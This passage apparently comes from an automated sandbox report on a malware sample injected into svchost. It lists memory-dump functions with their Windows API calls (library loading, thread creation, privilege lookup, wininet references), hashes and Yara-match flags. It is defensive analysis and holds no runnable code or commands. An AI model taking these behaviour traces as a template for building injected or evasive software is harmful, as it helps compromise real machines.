                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 8d7d715aa874561dbf93e29004c89a1b1ac12258bf7239a6221af69f6ce94191
                                                                • Instruction ID: c97fd12761346d65ce139ae699374ab1f8526070f4257c598eff7328708f0639
                                                                • Opcode Fuzzy Hash: 8d7d715aa874561dbf93e29004c89a1b1ac12258bf7239a6221af69f6ce94191
                                                                • Instruction Fuzzy Hash: 9790026922304402E180B169540860A0005ABD1242F91D419A0006558CCA6588A96361
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 03269FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 5083334d9de2fec95f45360cd0fa4e700f0319dd850173d2923c959a06c772f5
                                                                • Instruction ID: f8ecfbea5556132fe7617229998e1f3c873d993c0d99fc83ddf088f26410656e
                                                                • Opcode Fuzzy Hash: 5083334d9de2fec95f45360cd0fa4e700f0319dd850173d2923c959a06c772f5
                                                                • Instruction Fuzzy Hash: 3B90027132118802E110A16984047060005ABD1241F51C415A0815558D87E588D17162
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 03269610 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 52fd8143086accd5e3473135f0a4ac7b6b520c862427d71591e908361993cddb
                                                                • Instruction ID: 6a58ae800ef7e35f1006269b71e81374038e6d691f5bbcaf8b73345cef3971bf
                                                                • Opcode Fuzzy Hash: 52fd8143086accd5e3473135f0a4ac7b6b520c862427d71591e908361993cddb
                                                                • Instruction Fuzzy Hash: 6090027161504C02E150B16944147460005ABD0341F51C015A0015654D87A58A9576E1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 03269660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 45adcd197ad7b343f2a1cc972243781d57fdc81343b2c866acb720c990815126
                                                                • Instruction ID: 33add01b7ec24b3a2fafd5c0eb9568d82bfc0f33f11d8bebae3aa28d184bb04b
                                                                • Opcode Fuzzy Hash: 45adcd197ad7b343f2a1cc972243781d57fdc81343b2c866acb720c990815126
                                                                • Instruction Fuzzy Hash: 4390027121104C02E180B169440464A0005ABD1341F91C019A0016654DCB658A9977E1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 03269650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: d0a008030522e4d0d1c94c1b3dce978cacc22d75f9bec542afe8a90290f96bef
                                                                • Instruction ID: 0d9822df0afa2fb8e70140662e38d0faef42a1a1f62d03f771d6183f4bc416e2
                                                                • Opcode Fuzzy Hash: d0a008030522e4d0d1c94c1b3dce978cacc22d75f9bec542afe8a90290f96bef
                                                                • Instruction Fuzzy Hash: 7890027121508C42E140B1694404A460015ABD0345F51C015A0055694D97758D95B6A1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 032696E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: bfed3f9d80026e460ee86dbe06bf25c1d6e0b0c8cf8f5fc97ba3c8fecaf68bab
                                                                • Instruction ID: 35c7dca75b241e2cb1a6ecaddd52b00f00ec83f7645d516dfd4b04c192c248e5
                                                                • Opcode Fuzzy Hash: bfed3f9d80026e460ee86dbe06bf25c1d6e0b0c8cf8f5fc97ba3c8fecaf68bab
                                                                • Instruction Fuzzy Hash: 589002712110CC02E110A169840474A0005ABD0341F55C415A4415658D87E588D17161
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 032696D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: c095945b28b3bea952f538c7e4e1425be6ff5271670bb1b752bb98b170f00658
                                                                • Instruction ID: 300690253314623a02fc5237e0ab79229417c16800fbb885a35fef05261ac892
                                                                • Opcode Fuzzy Hash: c095945b28b3bea952f538c7e4e1425be6ff5271670bb1b752bb98b170f00658
                                                                • Instruction Fuzzy Hash: B590027121104C42E100A1694404B460005ABE0341F51C01AA0115654D8765C8917561
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 03269560 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 207be86656b4aef14cdf08132339db81cfbff479af94302beb1f7fd5e40c551e
                                                                • Instruction ID: 9f72f854a3fcb60b96b7972a823e5a905c03bede67c6b0051059a9df107ed28f
                                                                • Opcode Fuzzy Hash: 207be86656b4aef14cdf08132339db81cfbff479af94302beb1f7fd5e40c551e
                                                                • Instruction Fuzzy Hash: 20900265231044021145E569060450B0445BBD6391391C019F1407590CC77188A56361
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 03269540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 1d490facbf34e9695db6016cd694b98d68330f912ece427792862a60f3a8c822
                                                                • Instruction ID: 5dbfda2fe17b2d8c880bc35b635bde3aa7121b4f5beccd3120bc943b70c4d153
                                                                • Opcode Fuzzy Hash: 1d490facbf34e9695db6016cd694b98d68330f912ece427792862a60f3a8c822
                                                                • Instruction Fuzzy Hash: 85900265221044031105E56907045070046ABD5391351C025F1006550CD77188A16161
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 032695D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 9627abd2fee7509caec3252cc77390baaadf7b028ab1c83ec19c698dec73daba
                                                                • Instruction ID: 8edeadf63c898c103233b97691ba355b1ea67170399069a9caa56de790153927
                                                                • Opcode Fuzzy Hash: 9627abd2fee7509caec3252cc77390baaadf7b028ab1c83ec19c698dec73daba
                                                                • Instruction Fuzzy Hash: 489002A1212044035105B1694414616400AABE0241B51C025E1005590DC67588D17165
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02C28D70 Relevance: .3, Instructions: 288COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorMode
                                                                • String ID:
                                                                • API String ID: 2340568224-0
                                                                • Opcode ID: c13953546f4c55b705fb359b8bfabb5edac4d365304f56eabab4b8b489249783
                                                                • Instruction ID: e47a4247f299e882c24888df8c4c74f0363d895cf5af12f4c13ca67d53dfae66
                                                                • Opcode Fuzzy Hash: c13953546f4c55b705fb359b8bfabb5edac4d365304f56eabab4b8b489249783
                                                                • Instruction Fuzzy Hash: A7A1B2B1D00229ABDB15EFA4CC41FEEB7B9AF88304F14855DE509A7141EB70A748CFA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02C28D6F Relevance: .2, Instructions: 221COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorMode
                                                                • String ID:
                                                                • API String ID: 2340568224-0
                                                                • Opcode ID: 052b699cdc9770a83d5fed37e0719a9df2c9ffb85a83dbe45e93e47803251464
                                                                • Instruction ID: f28f3ab8c544b6bb1d902e6a0932fc442a436b9d46f1f8a3cea1f0cf9489f1de
                                                                • Opcode Fuzzy Hash: 052b699cdc9770a83d5fed37e0719a9df2c9ffb85a83dbe45e93e47803251464
                                                                • Instruction Fuzzy Hash: A671B1B1D00229AADB21EBA0CC40FEEB7BDEF89304F04455DE51962141EF74AB48CFA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02C3528C Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 101COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 02C352A7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Initialize
                                                                • String ID: )U$@J7<
                                                                • API String ID: 2538663250-745351555
                                                                • Opcode ID: 2e9acf3ea436267ac6b1c672ba4421ad71cc135f39b066c9471476c081959720
                                                                • Instruction ID: 055da7d23423f8f2a90f639f64421edb0be07f5848dfed6647328d39d059f369
                                                                • Opcode Fuzzy Hash: 2e9acf3ea436267ac6b1c672ba4421ad71cc135f39b066c9471476c081959720
                                                                • Instruction Fuzzy Hash: 2C3132B5A0060A9FDB01DFD8D8809EFB7B9FF88304B108959E519EB214D775EE45CBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02C3B580 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 92sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Sleep.KERNELBASE(000007D0), ref: 02C3B63B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID: net.dll$wininet.dll
                                                                • API String ID: 3472027048-1269752229
                                                                • Opcode ID: 268f49fbe1da827c9e036bf54babcb511f93a76c6f665a7b5ccc6034091e4141
                                                                • Instruction ID: df616c1a95d57bda869259b72443e3fcbe5705003a316abee74897e3e7981f9b
                                                                • Opcode Fuzzy Hash: 268f49fbe1da827c9e036bf54babcb511f93a76c6f665a7b5ccc6034091e4141
                                                                • Instruction Fuzzy Hash: FE31BEB5600704ABD714DFA4D880FABB7F9AB88704F14891DEA5D5B285D670B944CFA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02C3B574 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 84sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Sleep.KERNELBASE(000007D0), ref: 02C3B63B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID: net.dll$wininet.dll
                                                                • API String ID: 3472027048-1269752229
                                                                • Opcode ID: 4d6435498d57f30ac29b967735a62a9c8dcd99eb5a11f173fab415c28d69e30d
                                                                • Instruction ID: a6ea4cb80dbd236d0c9c13eb41b90d98bbdb1c6ddf5fe6a1663a92771e112532
                                                                • Opcode Fuzzy Hash: 4d6435498d57f30ac29b967735a62a9c8dcd99eb5a11f173fab415c28d69e30d
                                                                • Instruction Fuzzy Hash: 8631C0B1A00704ABD714DFA4D884FAAF7F9FF88704F14851AEA5C5B285D771A944CFA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02C2FCE0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 213COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?), ref: 02C2FE03
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID: @
                                                                • API String ID: 3188754299-2766056989
                                                                • Opcode ID: 93454b5118d32c2772475a0d467401533ed4b10397fdd0caec935d0875b7de68
                                                                • Instruction ID: 3f9553b86160c8d5a5b484ecad4671918cd737ddfbd9129355c499fd7a9ad255
                                                                • Opcode Fuzzy Hash: 93454b5118d32c2772475a0d467401533ed4b10397fdd0caec935d0875b7de68
                                                                • Instruction Fuzzy Hash: 5D7160B19002186ADB15DB64CCC5FEBB3BDEF58304F044D9DE61997141EB70AB859F90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02C35290 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 02C352A7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Initialize
                                                                • String ID: @J7<
                                                                • API String ID: 2538663250-2016760708
                                                                • Opcode ID: 3d1fca1031a19b8c4cf05f817d4a6f3596f287479a13a5a2150cad578f943d90
                                                                • Instruction ID: 5634cd59c144aab5cf401683e5e4453e912e56b06c0613783afebd1cdd3b7c17
                                                                • Opcode Fuzzy Hash: 3d1fca1031a19b8c4cf05f817d4a6f3596f287479a13a5a2150cad578f943d90
                                                                • Instruction Fuzzy Hash: D23130B5A0060A9FDB01DFD8C8809EFB7B9FF88304B508959E519EB214D775EE458BA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02C2B150 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02C2B1C2
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Load
                                                                • String ID:
                                                                • API String ID: 2234796835-0
                                                                • Opcode ID: 51f88520c29db4d47c07e15d5e3de82b87644f0aaa3e216130af3a830edd7316
                                                                • Instruction ID: fc3317536917944633720d3655a7feaf3e5cddbc2ca0d4ace75694b2ed31c655
                                                                • Opcode Fuzzy Hash: 51f88520c29db4d47c07e15d5e3de82b87644f0aaa3e216130af3a830edd7316
                                                                • Instruction Fuzzy Hash: E4011EB5E4020DBBDB10DAA4DC41F9EB7799B54308F0049A5E908A7251FA71EB18DB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02C2E7C1 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(02C34282,?,?,02C34282,00000000,?), ref: 02C2E7FA
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: 2821e490078af64dddc46576982e325d3115ca939e97bbc79c9864f4bc645924
                                                                • Instruction ID: 7f068c605c91e01e6bd04192325e09d9e4684370f13fc93142a9f383dcfe1fea
                                                                • Opcode Fuzzy Hash: 2821e490078af64dddc46576982e325d3115ca939e97bbc79c9864f4bc645924
                                                                • Instruction Fuzzy Hash: 61F04C725093941BF7215A7CDC06BE07B548F86734F1C03D5EDD89E1C3DE66E10A8280
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02C3CC91 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,02C2E122,02C2E122,?,00000000,?,?), ref: 02C3CCD0
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LookupPrivilegeValue
                                                                • String ID:
                                                                • API String ID: 3899507212-0
                                                                • Opcode ID: 0478b1b25585e0891a21a8d37a493bd511bcff86288ff7cb9802514e3dc0006c
                                                                • Instruction ID: 14f977b292b2a078a7fa4bb0a300e5995ed91df72bb75bd9548a20a63e1d4c9a
                                                                • Opcode Fuzzy Hash: 0478b1b25585e0891a21a8d37a493bd511bcff86288ff7cb9802514e3dc0006c
                                                                • Instruction Fuzzy Hash: E1F03CB66042046FD724EF58DC85EA737ADEF85224F058899FD499B242D630E9108BE0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02C3B6C0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,3B7578DC,00000000,00000000,02C2DDC2,?,?,?,3B7578DC,?), ref: 02C3B702
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateThread
                                                                • String ID:
                                                                • API String ID: 2422867632-0
                                                                • Opcode ID: d0c4d64f50121e0897393bd7a0303ed796e39248fad6c521a83a594f8b96c834
                                                                • Instruction ID: 3727cfffb277970dab28719cf7e54b2b6837c57292f1015e4aa3e3140fe3409f
                                                                • Opcode Fuzzy Hash: d0c4d64f50121e0897393bd7a0303ed796e39248fad6c521a83a594f8b96c834
                                                                • Instruction Fuzzy Hash: 05F06D7378021436E32062A9AC02FE7B69DDB85B71F180426FB0CEB1C0D992F8018AF5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02C3CB32 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,622BA63F,00000000,?), ref: 02C3CB6D
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID:
                                                                • API String ID: 3298025750-0
                                                                • Opcode ID: 185113c4ed9c95c0ad52ebe8323c515ce5dfcfe1b1fe3ad59e1e53c3d55ff7ff
                                                                • Instruction ID: e2e85df68a776f280c8b5e6e04692738e26e0bc78628767c58e341963a42cb28
                                                                • Opcode Fuzzy Hash: 185113c4ed9c95c0ad52ebe8323c515ce5dfcfe1b1fe3ad59e1e53c3d55ff7ff
                                                                • Instruction Fuzzy Hash: 84F0A9B42402006FCB19DF55CC48EEB3B6AEF893A0F208459F909A7282C230E911CAB1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02C2E7D0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(02C34282,?,?,02C34282,00000000,?), ref: 02C2E7FA
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: 6301650eee3e5bbfbeb5c7e2d36964e88c11d59366aa81b71f9b94b6dde3b12e
                                                                • Instruction ID: f7951fe43a5232cd7127299d700330ae2bfb2c7bc857682791400f7c46368a6f
                                                                • Opcode Fuzzy Hash: 6301650eee3e5bbfbeb5c7e2d36964e88c11d59366aa81b71f9b94b6dde3b12e
                                                                • Instruction Fuzzy Hash: DDE0867565020827FB246AACDC49FA633588FC8728F184650FA9CEB2C2DE74F6498554
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02C3CAC7 Relevance: 1.5, APIs: 1, Instructions: 25memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,622BA63F,00000000,?), ref: 02C3CB6D
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID:
                                                                • API String ID: 3298025750-0
                                                                • Opcode ID: a673fe6a02c8b6dc377b40048003395d9bc84ae260032fac4b060643fadd817f
                                                                • Instruction ID: c83c6dfb08f913ae7022c0241bca18315b31b7ecf63284448e4fe27796da0230
                                                                • Opcode Fuzzy Hash: a673fe6a02c8b6dc377b40048003395d9bc84ae260032fac4b060643fadd817f
                                                                • Instruction Fuzzy Hash: BEE0C0F00142C01FDB05FF6DD8808977FC9DF822143004D8EEC9457605C120D524DB71
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02C3CB40 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,622BA63F,00000000,?), ref: 02C3CB6D
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID:
                                                                • API String ID: 3298025750-0
                                                                • Opcode ID: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                • Instruction ID: 97501cb74c0d8a6b385b4050d952c0a5eec491f3308df6b2525ccc1606451304
                                                                • Opcode Fuzzy Hash: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                • Instruction Fuzzy Hash: 12E04FB12002046FCB14EF49DC44EA737ADEF88760F014454FD0957241C630F910CAF1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02C3CB00 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(02C36EE3,?,02C3768D,02C3768D,?,02C36EE3,00000000,?,?,?,?,00000000,00000000,00000002), ref: 02C3CB2D
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
